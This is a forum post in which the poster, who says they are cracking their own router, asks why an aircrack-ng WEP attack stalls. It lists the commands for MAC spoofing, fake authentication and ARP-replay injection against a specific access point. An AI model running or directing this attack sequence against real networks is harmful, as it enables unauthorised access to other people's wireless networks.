Im following a tutorial to try and crack my new router, all my hardware is compatiable as I cracked my old router with the same hardware. Below is the code I have used so far-
Code:
airmon-ng stop ath0
ifconfig down wifi0
macchanger --mac 00:11:22:33:44:55 wifi0
airmon-ng start ath0
airodump-ng -c 8 -w network.out --bssid 00:0F:B5:78:EC:B6 ath0
//shows AP just fine with adequate power level
aireplay-ng -1 0 -a 00:0F:B5:78:EC:B6 -h 00:11:22:33:44:55 ath0
//says authentication is succesfull, as on tutorial
aireplay-ng -3 -b 00:0F:B5:78:EC:B6 -h 00:11:22:33:44:55 ath0
After i enter the last line of the code, the #data and packet columns i think should start to rapidly increase but they dont increae at all.
Also in aireplay-ng the arp requests should start to increase but they seem to stay the same eg
Code:
Read 839 packets (got 0 ARP requests), sent 0 packets...(322 pps)
wireless card WG311t
router belkin54g
any ideas
Thanks in advance